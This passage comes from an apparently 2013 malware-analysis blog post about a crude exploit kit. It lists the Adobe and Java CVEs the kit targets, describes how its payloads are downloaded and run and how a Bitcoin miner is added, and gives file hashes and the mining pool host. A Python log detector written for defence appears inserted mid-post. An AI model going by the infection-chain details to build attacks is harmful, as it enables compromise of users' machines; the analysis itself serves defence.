<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Not implemented</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;"><pre>Java 6 JAR - <a href="https://www.virustotal.com/en/file/7bfe57ba4fd56fc10e06e98dfae614530c3ed27b4f5f241a2a9b023e991aa814/analysis/" rel="nofollow" target="_blank">virustotal.com</a>
Java 7 JAR - <a href="https://www.virustotal.com/en/file/0e1089d453acfc63ecee6f36f5ba09d700467825d03c5b854a675a6c1ae67cf9/analysis/" rel="nofollow" target="_blank">virustotal.com</a></pre>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;"><pre>EXE(MD5 8f8471acff7e18f61dc2def2bc353574)
<a href="https://malwr.com/analysis/N2FkNmVhNjg2MzQ2NGMzMjkyNjBjMDY1MDNiMTcwYzM/" rel="nofollow" target="_blank">https://malwr.com/</a>
<a href="https://www.virustotal.com/en/file/92c959c36617445a35e6f4f2ee2733861aa1b3baf8728d19a4fd5176f3c80401/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a></pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;"><pre>Initial Payload crashes in VM
Possibly VM/debug aware</pre>
</td>
</tr>
</tbody></table>
</div>
<br />
External links:<br />
<br />
<a href="http://urlquery.net/report.php?id=5963492">http://urlquery.net/report.php?id=5963492</a><br />
<a href="http://blogs.cisco.com/security/watering-hole-attacks-target-energy-sector/">http://blogs.cisco.com/security/watering-hole-attacks-target-energy-sector/</a><br />
<a href="http://www.exploit-db.com/exploits/25294/">http://www.exploit-db.com/exploits/25294/</a><br />
<br />
<br />
<b><span style="color: #3d85c6;">Unknown EK: "... It ain't no trick, To get rich quick, If ya dig dig dig ..."</span></b> (posted 2013-09-08)<br />
<br />
Yet another '<span style="color: #3d85c6;">wannabe</span>' exploit kit in the making. Thanks to <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a> for sharing this sample. The sample was discovered through the <a href="https://twitter.com/urlquery" rel="nofollow" target="_blank">@urlquery</a> service.<br />
<br />
NOTE: The information is based on a sample captured on 2013-09-05<br />
<br />
<b><span style="color: #3d85c6;">"Heigh-ho, Heigh-ho"</span></b><br />
<br />
The URL pattern is rather '<span style="color: #3d85c6;">messy</span>', but at the same time unique.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_usbriAtOweYAGDnxwuvBQT0358XNKuWm6kDwye-j4L-CJKSbiHrKsS9_zAKl2vx7igED9K3saCNbRLSV6mEDYfvTRGEYatMeLK3VcPAjdOqeZaY6Pz3I1qWm5xCp3gIRN9EAjnqYA0T5/s1600/Unknown_2013-09-06_URL_pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_usbriAtOweYAGDnxwuvBQT0358XNKuWm6kDwye-j4L-CJKSbiHrKsS9_zAKl2vx7igED9K3saCNbRLSV6mEDYfvTRGEYatMeLK3VcPAjdOqeZaY6Pz3I1qWm5xCp3gIRN9EAjnqYA0T5/s1600/Unknown_2013-09-06_URL_pattern.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">HTTP requests observed</span></i></div>
<br />
The Landing Page is as simple as it can be. No fancy JavaScript, no obfuscation, no data encoding. It targets Java and Adobe products by bombarding a potential victim machine with everything it has - it doesn't do any version checks. Here is the list of vulnerabilities it tries to exploit:<br />
<ul>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188" rel="nofollow" target="_blank">CVE-2010-0188</a> (Adobe Reader and Acrobat before 8.2.1 and before 9.3.1)</li>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297" rel="nofollow" target="_blank">CVE-2010-1297</a> (Adobe Flash Player before 9.0.277.0 and before 10.1.53.64; Adobe AIR before 2.0.2.12610; and Adobe Reader and Acrobat before 9.3.3, and before 8.2.3)</li>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2884" rel="nofollow" target="_blank">CVE-2010-2884</a> (Adobe Flash Player 10.1.82.76 and earlier and Adobe Reader and Acrobat before 9.4 and before 8.2.5)</li>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2992" rel="nofollow" target="_blank">CVE-2008-2992</a> (Adobe Acrobat and Reader 8.1.2 and earlier)</li>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465" rel="nofollow" target="_blank">CVE-2013-2465</a> (Java 7 through to update 21, Java 6 update 45 and earlier) </li>
</ul>
<div>
The Adobe infection vector starts with the assembly of an array that holds the list of URLs pointing at the malicious PDF files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib1RTgUaUVpneDljkne8l1xbOMI_cGZ7ks4ZsdFQ4RnZa2FFzEH2JHwGrnsllzhDWmrWKW_fzY_NHWZbn9Ec7nBzgRaRga7A8NHQhoovgGeWwQ-qqyk9awKqeNI8dTaQfHdK0o2WLn-Ixa/s1600/Unknown_2013-09-06_Adobe_assembly.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib1RTgUaUVpneDljkne8l1xbOMI_cGZ7ks4ZsdFQ4RnZa2FFzEH2JHwGrnsllzhDWmrWKW_fzY_NHWZbn9Ec7nBzgRaRga7A8NHQhoovgGeWwQ-qqyk9awKqeNI8dTaQfHdK0o2WLn-Ixa/s1600/Unknown_2013-09-06_Adobe_assembly.png" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>filling up array with URLs</i></span></div>
<br />
Once the array is ready, the malicious PDFs are requested one by one using this function:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfEXKgIVKV29POBdWSUDdSequG9s_XDwqI1nhBJG3rmcsnLp5rdPxUS_GMdXszQQnvpbPsq5drEGcbMQQiJTt8fh6FIEwjJzLd0e9PFULqHDB_LaMBHdUDigG4qqFUEbJEGlFZS3dHMWla/s1600/Unknown_2013-09-06_Adobe_launch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfEXKgIVKV29POBdWSUDdSequG9s_XDwqI1nhBJG3rmcsnLp5rdPxUS_GMdXszQQnvpbPsq5drEGcbMQQiJTt8fh6FIEwjJzLd0e9PFULqHDB_LaMBHdUDigG4qqFUEbJEGlFZS3dHMWla/s1600/Unknown_2013-09-06_Adobe_launch.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">requesting malicious PDFs</span></i></div>
<br />
It's possible that multiple copies of the Initial Payload will be requested if the Adobe product installed on the victim's PC is vulnerable to more than one of the attempted exploits. It's hard to tell what exactly happens in this scenario, though, since the Initial Payload delivered through each Adobe exploit is stored under a hardcoded name - '<span style="color: #3d85c6;">update.exe</span>' - in a predefined location - '<span style="color: #3d85c6;">user Temp folder</span>'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNgQnRy5rLXf06afz7QYSKFntZ5GTDAuLKITk6RgYjVy_yo2ZDLs14gS8e8zKWNrHMfB0k3asSR5eSuuJH7Vjq4De95tqFrQaV-gWNq0umfAsGDT1-1DLIRXE8iqqZf7rcHfy7XK1P7WYJ/s1600/Unknown_2013-09-06_Adobe_payload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="21" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNgQnRy5rLXf06afz7QYSKFntZ5GTDAuLKITk6RgYjVy_yo2ZDLs14gS8e8zKWNrHMfB0k3asSR5eSuuJH7Vjq4De95tqFrQaV-gWNq0umfAsGDT1-1DLIRXE8iqqZf7rcHfy7XK1P7WYJ/s1600/Unknown_2013-09-06_Adobe_payload.png" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>part of shellcode extracted from malicious PDF file</i></span></div>
<br />
The Java infection vector starts with a request for the malicious JAR file. No additional parameters (encoded URL, decoding key, etc.) are passed to the JVM.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmagAWectIZw6s8sQzI1oO2dlp23SO0yzjTZ81e1DxYR8H7Kck3di4r45wrIfH2yYE8pq7VFqpJ-8WvyIQDUW7dF4z0Ck_HhlUIKYrjSMwXUPKdW7ub18ycFTddhFYvAVQIdQhvVW8YBG0/s1600/Unknown_2013-09-06_JAR_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="35" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmagAWectIZw6s8sQzI1oO2dlp23SO0yzjTZ81e1DxYR8H7Kck3di4r45wrIfH2yYE8pq7VFqpJ-8WvyIQDUW7dF4z0Ck_HhlUIKYrjSMwXUPKdW7ub18ycFTddhFYvAVQIdQhvVW8YBG0/s1600/Unknown_2013-09-06_JAR_request.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">requesting JAR file using &lt;object&gt;</span></i></div>
<br />
The author is possibly a big fan of '<a href="https://en.wikipedia.org/wiki/Toby_the_Tram_Engine" rel="nofollow" target="_blank">Toby The Tram Engine</a>' (sorry, couldn't resist). Anyway, the JAR file is armed with an exploit for CVE-2013-2465.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT1WvSkyhpovD6W6DTtxHYKtMM84kgJOA2dk_KwqJckkucyq4otGhplVmvlT59WxI4DMQzVaEYY37JpGS36RLHU29Yw8s6dM6br13Xg0gGZ8g9dpxnIhMQ1EdxAh7nfIH3z0Fx7pKNBQAD/s1600/Unknown_2013-09-06_CVE-2013-2465.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT1WvSkyhpovD6W6DTtxHYKtMM84kgJOA2dk_KwqJckkucyq4otGhplVmvlT59WxI4DMQzVaEYY37JpGS36RLHU29Yw8s6dM6br13Xg0gGZ8g9dpxnIhMQ1EdxAh7nfIH3z0Fx7pKNBQAD/s1600/Unknown_2013-09-06_CVE-2013-2465.png" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>part of CVE-2013-2465 exploit code</i></span></div>
<br />
The Initial Payload is requested using a hardcoded URL and stored in the Java Temp folder under a, yet again, hardcoded filename - '<span style="color: #3d85c6;">g.exe</span>'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiVC35imx9dsqlsiR4wphwaeSKbJts02_V5gPQiitIE2Rqu1EPECS5OQaZ_kdQSlVKCtRHsK-zuam1IAGzhVWW3ltywZmlJeXshBbPdcHDognXJNZ4UUSBkmNMg6E_B1maTeMq_s1NjFQD/s1600/Unknown_2013-09-06_Initial_Payload_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="28" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiVC35imx9dsqlsiR4wphwaeSKbJts02_V5gPQiitIE2Rqu1EPECS5OQaZ_kdQSlVKCtRHsK-zuam1IAGzhVWW3ltywZmlJeXshBbPdcHDognXJNZ4UUSBkmNMg6E_B1maTeMq_s1NjFQD/s1600/Unknown_2013-09-06_Initial_Payload_request.png" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The Initial Payload execution method is rather interesting - '<span style="color: #3d85c6;">cmd.exe</span>' is used.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrHjQaAjk8QyazcvqnnAmSazc8gLeasvQx5-XDXZnk72SkAdogCfsZRaSAJd5LciNvFvf11tIH9X3hOzQ8KU8ZBTfpPVGQ6XgvMu_v6r-dDQ9f4oU1BpvoaW3ocjL-roFzAXErYMJGEoZO/s1600/Unknown_2013-09-06_Initial_Payload_execution.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="15" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrHjQaAjk8QyazcvqnnAmSazc8gLeasvQx5-XDXZnk72SkAdogCfsZRaSAJd5LciNvFvf11tIH9X3hOzQ8KU8ZBTfpPVGQ6XgvMu_v6r-dDQ9f4oU1BpvoaW3ocjL-roFzAXErYMJGEoZO/s1600/Unknown_2013-09-06_Initial_Payload_execution.png" width="320" /></a></div>
<br />
Once executed, it launches an Internet browser and checks for Internet connectivity by '<span style="color: #3d85c6;">calling</span> <span style="color: #3d85c6;">home</span>'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz8EHAxQc9kHpaGpvzF6U3rTSco9t8edCnyc_GUC4a7PWeytcM9sf5T8rC3vqTdmxJovICyMQlNaOzAhDB-ZRKe7zKM-VrJ9lHp7t_CaUErcxG0lEW3iXlqm2rGXdLMWTSOid1D-zQdFwy/s1600/Unknown_2013-09-06_Initial_Payload_callback.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz8EHAxQc9kHpaGpvzF6U3rTSco9t8edCnyc_GUC4a7PWeytcM9sf5T8rC3vqTdmxJovICyMQlNaOzAhDB-ZRKe7zKM-VrJ9lHp7t_CaUErcxG0lEW3iXlqm2rGXdLMWTSOid1D-zQdFwy/s1600/Unknown_2013-09-06_Initial_Payload_callback.png" width="320" /></a></div>
<br />
The browser will be redirected to '<span style="color: #3d85c6;">Google</span>', but an additional payload will be requested in the background.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihm4pvXAp_VCzICNlDi_up1WnGbqUOnHdtFKCVYrWSeDsElFiflBqkY97t_-jjEGIO6eXlsKQDGvvhVyBzKIhGvhhewrQQo1stxSu6sYt7ImDzpTy_eTvQp0yJ126A8Hqn8AOWJGzdVWbo/s1600/Unknown_2013-09-06_Secondary_Payload_request1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihm4pvXAp_VCzICNlDi_up1WnGbqUOnHdtFKCVYrWSeDsElFiflBqkY97t_-jjEGIO6eXlsKQDGvvhVyBzKIhGvhhewrQQo1stxSu6sYt7ImDzpTy_eTvQp0yJ126A8Hqn8AOWJGzdVWbo/s1600/Unknown_2013-09-06_Secondary_Payload_request1.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">additional payload request</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5p_2lKd3Gk_ZKos2aoLdfBXFI8RQaU92zEf0yh1QotfsBwGVDiX0OiKWZ_1vLOkYVf-nHh0toO4c5xW5rILl18hGQpjCzgWyu3S2n-bCZYkEBg-HViOr4HionJa2Y8ienjD6IYKoqa1kR/s1600/Unknown_2013-09-06_Secondary_Payload_request2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5p_2lKd3Gk_ZKos2aoLdfBXFI8RQaU92zEf0yh1QotfsBwGVDiX0OiKWZ_1vLOkYVf-nHh0toO4c5xW5rILl18hGQpjCzgWyu3S2n-bCZYkEBg-HViOr4HionJa2Y8ienjD6IYKoqa1kR/s1600/Unknown_2013-09-06_Secondary_Payload_request2.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">this one turned out to be a BitCoin miner</span></i></div>
<br />
Neither the Initial nor the additional payloads were transferred with any encoding or encryption applied. At the time of writing, all three files had good coverage on VT (see the summary for more details).<br />
<br />
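To make the chain above actionable on the defensive side, here is an added detection example. It is my own illustration, not code from the post, the PCAP or the kit: it runs over constructed proxy-style log lines (the hostnames such as ek.example.invalid are placeholders, since the real ones only appear in the screenshots) and flags the indicators described above - several PDFs fetched one by one from the same host, a JAR request, an EXE downloaded under one of the hardcoded names ('update.exe', 'g.exe') and a later connection to the mining pool listed in the summary. It also labels a downloaded file when its MD5 matches one of the three payload hashes from the summary table.<br />

```python
"""Chain detection over constructed proxy-style log lines (added example)."""
import hashlib
import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlsplit

# IoCs taken from the post's summary table.
KNOWN_PAYLOAD_MD5 = {
    "0e9337ee028e3e4b0bffebd7d1e502d2": "EXE1",
    "de660551fb0670c16ec5b344d63406dd": "EXE2",
    "3256da849bc3c62a6a015cf077794df2": "EXE3",
}
HARDCODED_PAYLOAD_NAMES = {"update.exe", "g.exe"}  # Adobe and Java vectors
MINING_POOL_HOST = "eu-stratum.btcguild.com"

# Constructed sample: "<timestamp> <client> <method> <target> <content-type>".
# Hostnames are placeholders, not the ones from the PCAP.
SAMPLE_LOG = """\
2013-09-05T10:00:01Z 10.0.0.5 GET http://ek.example.invalid/landing.html text/html
2013-09-05T10:00:02Z 10.0.0.5 GET http://ek.example.invalid/p1.pdf application/pdf
2013-09-05T10:00:03Z 10.0.0.5 GET http://ek.example.invalid/p2.pdf application/pdf
2013-09-05T10:00:04Z 10.0.0.5 GET http://ek.example.invalid/p3.pdf application/pdf
2013-09-05T10:00:05Z 10.0.0.5 GET http://ek.example.invalid/toby.jar application/java-archive
2013-09-05T10:00:07Z 10.0.0.5 GET http://ek.example.invalid/update.exe application/octet-stream
2013-09-05T10:00:08Z 10.0.0.5 GET http://ek.example.invalid/g.exe application/octet-stream
2013-09-05T10:00:15Z 10.0.0.5 GET http://www.google.com/ text/html
2013-09-05T10:00:20Z 10.0.0.5 CONNECT eu-stratum.btcguild.com:3333 -
2013-09-05T10:05:00Z 10.0.0.9 GET http://intranet.example.invalid/report.pdf application/pdf
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<target>\S+) (?P<ctype>\S+)$"
)


@dataclass
class Request:
    ts: str
    client: str
    method: str
    host: str
    path: str
    ctype: str


def parse_line(line):
    """Parse one log line; returns None for lines that do not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    target = m.group("target")
    if m.group("method") == "CONNECT":  # "host:port" without scheme or path
        host, path = target.rsplit(":", 1)[0], ""
    else:
        parts = urlsplit(target)
        host, path = parts.hostname or "", parts.path
    return Request(m.group("ts"), m.group("client"), m.group("method"),
                   host.lower(), path, m.group("ctype"))


def analyse_log(text, pdf_burst=2):
    """Return {client: [finding, ...]} for every client showing chain indicators."""
    per_client = defaultdict(list)
    for line in text.splitlines():
        req = parse_line(line)
        if req is not None:
            per_client[req.client].append(req)

    findings = {}
    for client, reqs in per_client.items():
        notes = []
        pdf_per_host = defaultdict(int)
        for r in reqs:
            name = r.path.rsplit("/", 1)[-1].lower()
            if r.ctype == "application/pdf" or name.endswith(".pdf"):
                pdf_per_host[r.host] += 1
            if name.endswith(".jar"):
                notes.append(f"JAR requested from {r.host}")
            if name in HARDCODED_PAYLOAD_NAMES:
                notes.append(f"hardcoded payload name '{name}' fetched from {r.host}")
            if r.host == MINING_POOL_HOST:
                notes.append(f"connection to mining pool {r.host}")
        # Several PDFs from one host in a session is the one-by-one exploit attempt.
        for host, n in pdf_per_host.items():
            if n >= pdf_burst:
                notes.insert(0, f"{n} PDFs requested from {host}")
        if notes:
            findings[client] = notes
    return findings


def identify_payload(data):
    """Label a downloaded file if its MD5 matches a hash from the summary table."""
    return KNOWN_PAYLOAD_MD5.get(hashlib.md5(data).hexdigest())


if __name__ == "__main__":
    for client, notes in analyse_log(SAMPLE_LOG).items():
        print(client)
        for note in notes:
            print("  -", note)
```

Running it flags only 10.0.0.5: three PDFs from one host, the JAR, both hardcoded payload names and the stratum pool connection, while the single corporate PDF download by 10.0.0.9 stays quiet. The PDF-burst threshold is a tunable; one PDF is normal browsing, several from the same host within seconds is the multi-exploit pattern described above.<br />
<br />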
<b><span style="color: #3d85c6;">Summary</span></b><br />
<br />
Another '<span style="color: #3d85c6;">piece of ... art</span>' work by someone who just learnt how to write '<span style="color: #3d85c6;">Hello, World!</span>'. I guess I should take a stab at naming it. '<span style="color: #3d85c6;">Toby EK</span>' sounds too simple and non-tech. '<span style="color: #3d85c6;"><a href="http://en.wikipedia.org/wiki/Teletubbies" rel="nofollow" target="_blank">Teletubbies</a> EK</span>', on the other hand, reflects both the technical complexity of the exploit kit and the professional level of the author/authors. Well, anyway, here is the summary for this particular sample.<br />
<br /></div>
<style type="text/css">.nobrtable br { display: none }</style>
<br />
<div class="nobrtable">
<table align="center" border="2" bordercolor="#FFFFFF" cellpadding="3" cellspacing="3" style="background-color: black; width: 100%;">
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>General Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">Unknown</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2013-09-05</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2013-09-07</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">PCAP from <a href="https://twitter.com/urlquery" rel="nofollow" target="_blank">@urlquery</a> shared by <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a></td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java, Adobe</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;"><pre>CVE-2010-0188
CVE-2010-1297
CVE-2010-2884
CVE-2008-2992
CVE-2013-2465</pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Transfer mode:</td>
<td style="background-color: #b8cce4; color: black;">encoded / gzip</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Java 1.6.26</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR hidden content:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">Java Temp folder</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Hardcoded - 'g.exe'</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Adobe infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Adobe Reader 8</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">User Temp folder</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Hardcoded - 'update.exe'</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;"><pre>PDF1 - <a href="http://jsunpack.jeek.org/?report=bb7cc6807862fc411f6d021f9656990fb72da442" rel="nofollow" target="_blank">http://jsunpack.jeek.org/</a>
PDF2 - <a href="http://jsunpack.jeek.org/?report=818d9d76c4d759d13740a3ce5226df03649486b1" rel="nofollow" target="_blank">http://jsunpack.jeek.org/</a>
PDF3 - <a href="http://jsunpack.jeek.org/?report=c6549212e6a3cb089cb3e80606e87946f403cbd4" rel="nofollow" target="_blank">http://jsunpack.jeek.org/</a>
PDF4 - <a href="http://jsunpack.jeek.org/?report=634bc48cd8bcd4472cbe7c1004fbd8ce5852b924" rel="nofollow" target="_blank">http://jsunpack.jeek.org/</a>
PDF5 - <a href="http://jsunpack.jeek.org/?report=d3bd05136115e5a4742e930fdc40b1dd48b96ef1" rel="nofollow" target="_blank">http://jsunpack.jeek.org/</a></pre>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;"><pre>EXE1(MD5 0e9337ee028e3e4b0bffebd7d1e502d2)
<a href="https://malwr.com/analysis/ZjA5MzhjOTYzY2Y1NGZmODg0NmZmZDAyZjVlOTM4ODY/" rel="nofollow" target="_blank">https://malwr.com/</a>
<a href="https://www.virustotal.com/en/file/abc089964afdee144d9934f636b68275024c0876eaa0ba5c356d37ac921a49e9/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a>
</pre>
<pre>EXE2(MD5 de660551fb0670c16ec5b344d63406dd)
<a href="https://malwr.com/analysis/ZDczNGRhMmFkZGE3NDg4MThmODhjMzUyNDJlMTY1ZjY/" rel="nofollow" target="_blank">https://malwr.com/</a>
<a href="https://www.virustotal.com/en/file/d9999e5121f45481e560babcb7b1a56c6b7213c61489a84f400ce9e9b3833fe5/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a>
</pre>
<pre>EXE3(MD5 3256da849bc3c62a6a015cf077794df2)
<a href="https://malwr.com/analysis/Nzk3YWE1Y2YyYTI2NDc3N2E2NGEyNzU2YmU2OTI1ZDE/" rel="nofollow" target="_blank">https://malwr.com/</a>
<a href="https://www.virustotal.com/en/file/a02086ad41d191d7cede256022cbcf013c2a3ff2593d99b3a0e23a2c955513c9/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a>
</pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;"><pre>BitCoin miner is configured to use
'eu-stratum.btcguild.com' mining pool.</pre>
</td>
</tr>
</tbody></table>
</div>